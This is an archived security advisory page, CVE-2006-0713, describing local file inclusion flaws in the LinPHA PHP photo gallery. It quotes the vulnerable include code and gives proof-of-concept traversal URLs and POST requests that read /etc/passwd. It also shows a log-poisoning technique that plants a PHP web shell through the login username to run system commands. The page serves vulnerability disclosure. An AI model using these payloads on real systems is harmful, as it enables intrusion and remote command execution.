|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 426 CVE : CVE-2006-0713 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : rgod Published : 15.02.2006
Advisory Content : ------------- Linpha multiple arbitrary local inclusion ----------------- software: site: http://linpha.sourceforge.net/nuke/ description: " LinPHA is an easy to use, multilingual, flexible photo / image archive / album / gallery written in PHP. It uses a SQL database to store information about your pictures." ------------------------------------------------------------------------ -------- i) vulnerable code in docs/index.php at lines 28 - 41: ... if(isset($_GET['lang'])) // come from install pages { $include_lang = $_GET['lang']; } elseif(file_exists(TOP_DIR.'/sql/db_connect.php')) { include_once(TOP_DIR.'/functions/db_api.php'); $include_lang = get_language(); } else { $include_lang = get_http_accept_lang(); } include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php'); ... well, you can include an arbitrary php file from local resources, poc: http://[target]/[host]/docs/index.php?lang=/../../../../../../../../../. ./test and, if magic_quotes_gpc = Off, any file: http://[target]/[host]/docs/index.php?lang=/../../../../../../../../../. ./etc/passwd%00 ------------------------------------------------------------------------ -------- ii) install directory is not removed after installation, you cannot use files to modify settings but we have arbitrary local inclusion issues in several files: ------------------------------------------------------------------------ -- ii.a) vulnerable code in install/install.php at lines 26-36: ... if (@$_GET['language']) { $lang=$_GET['language']; } else if (@$_POST['language']) { $lang=$_POST['language']; } else if ($http_accept_lang) { $lang = $http_accept_lang; } else { $lang="English"; } include_once(TOP_DIR.'/lang/lang.'.$lang.'.php'); ... poc: http://[target]/[path]/install/install.php?language=/../../../../../../. ./test if magic_quotes_gpc = Off: http://[target]/[path]/install/install.php?language=/../../sql/tmp/linph a.log%00 ------------------------------------------------------------------------ -- ii.b) vulnerable code in install/sec_stage_install.php at lines 22-31: ... switch($_GET['whatlang']) { case 1: include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php'); break; default: include_once(TOP_DIR.'/lang/lang.English.php'); break; } ... poc: http://[target]/[path]/install/sec_stage_install.php?whatlang=1&language =/../../../../../../../test if magic_quotes_gpc = Off: http://[target]/[path]/install/sec_stage_install.php?whatlang=1&language =/../../../../../../../etc/passwd%00 ------------------------------------------------------------------------ -- ii.c) vulnerable code in install/third_stage_install.php at line 22: ... include_once(TOP_DIR.'/lang/lang.'.$_GET['language'].'.php'); ... poc: http://[target]/[path]/install/sec_stage_install.php?language=/../../../ ../../../../test if magic_quotes_gpc = Off: http://[target]/[path]/install/sec_stage_install.php?language=/../../../ ../../../../etc/passwd%00 ------------------------------------------------------------------------ -- ii.d) vulnerable code in install/forth_stage_install.php at line 22: ... include_once(TOP_DIR.'/lang/lang.'.$_POST['language'].'.php'); ... poc: POST [path]install/forth_stage_install.php HTTP/1.1rn"; Host: [somehost] Content-Type: application/x-www-form-urlencoded Content-Length: [data_length] User-Agent: GameBoy, Powered by Nintendo Connection: Close language=/../../../../../../../../test if magic_quotes_gpc = Off: POST [path]install/forth_stage_install.php HTTP/1.1rn"; Host: [somehost] Content-Type: application/x-www-form-urlencoded Content-Length: [data_length] User-Agent: Sun-Tzu Connection: Close language=/../../../../../../../../etc/passwd%00 ------------------------------------------------------------------------ -------- iii) if "user login events log" is set to "file" in Linpha administration (not the default) a remote user can inject arbitrary code in sql/tmp/linpha.log poc: try to login with username: <?php system($_GET[cmd]);?> and password: [whatever] now in sql/tmp/linpha.log we have something like this: USER | ERROR | 20060211 035519 | 192.168.1.5 | User <?php system($_GET[cmd]);?>: login failed! now, if magic_quotes_gpc = Off on target system, you can launch operating system commands, poc: http://[target]/[path]/docs/index.php?cmd=ls%20-la〈=/../../sql/ tmp/l inpha.log%00 (same technique with install dir scripts...) ------------------------------------------------------------------------ -------- rgod site: http://retrogod.altervista.org mail: rgod at autistici org original adivsory: http://retrogod.altervista.org/linpha_10_local.html ------------------------------------------------------------------------ --------  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |